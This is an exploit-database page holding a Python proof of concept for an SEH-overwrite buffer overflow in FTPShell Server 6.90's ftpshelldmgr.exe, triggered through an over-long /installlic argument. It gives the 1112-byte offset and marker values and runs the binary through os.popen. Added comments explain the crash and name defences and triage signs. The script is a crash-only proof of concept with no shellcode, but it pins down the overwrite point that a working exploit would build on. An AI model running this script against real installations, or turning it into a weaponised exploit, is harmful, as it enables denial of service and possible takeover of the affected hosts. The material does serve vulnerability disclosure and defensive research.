## https://sploitus.com/exploit?id=PACKETSTORM:158259
# Exploit Title: FTPShell Server 6.90 (ftpshelldmgr.exe)- Buffer Overflow (SEH)(PoC)  
# Exploit Author: Saeed reza Zamanian  
# Date: 2020-07-01  
# Vendor: Code Origin  
# Vendor Homepage: https://www.ftpshell.com/  
# Software Link: https://www.ftpshell.com/downloadserver.htm  
# Version: 6.90 Release Date : Jan 31, 2020  
# Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC  
# Tested On: Windows Vista SP2 -- build 6002 32-bit   
#  
# Replicate Crash:  
# 1) Download and install the application  
# 2) Execute the exploit (with administrative permissions)  
# 3) Crash with SEH Overwrite  
#  
# You can also pass "/installlic {PAYLOAD}" in the arguments field of your debugger (Immunity or OllyDbg)  
  
# SEH chain of main thread  
# Address SE handler  
# 0020FBFC 43434343  
# 42424242 *** CORRUPT ENTRY ***  
  
  
#!/usr/bin/python  
import os  
  
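# Install directory the manager binary is launched from. Backslashes are
# escaped explicitly: the original literal relied on '\P' and '\F' passing
# through as unknown escape sequences, which newer Python versions warn about.
# The resulting string value is unchanged.
directory = 'C:\\Program Files\\FTPShellServer\\'  # default
# directory = 'C:\\Program Files (x86)\\FTPShellServer\\'  # directory_for_x64

# Crash-only proof of concept. The three pieces below are recognisable marker
# bytes, not addresses or code: they exist so the overwritten SEH record can be
# identified in a debugger (the header dump shows handler 43434343 and a
# corrupt next entry at 42424242).
offset = '\x41' * 1112      # 'A' filler; 1112 is the distance the PoC author reports
nSEH = '\x42\x42\x42\x42'   # 'BBBB' lands in the next-SEH pointer
SEH = '\x43\x43\x43\x43'    # 'CCCC' lands in the SE handler pointer

# 1112 + 4 + 4 = 1120 characters. Neither marker is a valid code address, so
# the observable result is a fault in ftpshelldmgr.exe. The finding for a
# defender is that an over-long /installlic argument reaches the
# exception-handler record at all, i.e. the argument is copied without a
# length check.
# NOTE(review): SafeSEH and SEHOP are the platform mitigations for this class
# of overwrite; whether this binary is built with them, and which release
# fixes the copy, is not stated on this page - confirm with the vendor.
payload = offset + nSEH + SEH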
  
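# Reproduce the crash locally by handing the marker string to the manager
# binary as its /installlic argument. Per the header this is run on the host
# where FTPShell Server is installed, with administrative permissions.
#
# Triage note: with process-creation command-line auditing enabled, this run
# shows up as ftpshelldmgr.exe started with an /installlic argument over a
# thousand characters long, followed by an application fault.
try:
    print("[+] Creating %s sending evil payload." % len(payload))
    # The command line is built by plain concatenation and run through the
    # shell. Every part is a constant defined above; do not feed external
    # input into this string.
    comm = 'cd ' + directory + ' && ftpshelldmgr.exe /installlic ' + payload
    stream = os.popen(comm)
    try:
        output = stream.read()
    finally:
        # Always release the pipe, even if reading fails.
        stream.close()
    # os.popen() does not raise when the command itself fails (for example a
    # wrong install directory), so this line only confirms that the shell was
    # started, not that the target crashed. Check the debugger or the
    # application event log for the fault.
    print("[+] payload sent!")
except Exception:
    # Narrowed from a bare 'except:' so Ctrl-C and interpreter exit still work.
    print("Failed.")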